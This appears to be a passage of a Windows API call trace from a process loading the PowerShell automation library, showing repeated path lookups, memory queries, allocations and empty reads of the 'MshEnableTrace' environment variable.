	[0419.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0419.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0420.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0420.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0420.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0420.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0421.089] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0421.094] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.094] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.098] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0421.106] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.106] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.107] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.107] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.107] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.108] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.801] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.801] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.807] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.807] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.809] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0421.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0421.809] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0421.815] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0421.818] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0422.754] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0422.763] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0422.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0422.763] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0423.785] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8ad400
	[0423.786] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8ad510
	[0424.874] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.589] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.591] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.592] VirtualQuery (in: lpAddress=0x20a3e0, lpBuffer=0x20b2a0, dwLength=0x30 | out: lpBuffer=0x20b2a0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.613] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.614] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.615] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.615] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.616] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.616] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.617] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.617] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.618] VirtualQuery (in: lpAddress=0x20b990, lpBuffer=0x20c850, dwLength=0x30 | out: lpBuffer=0x20c850*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
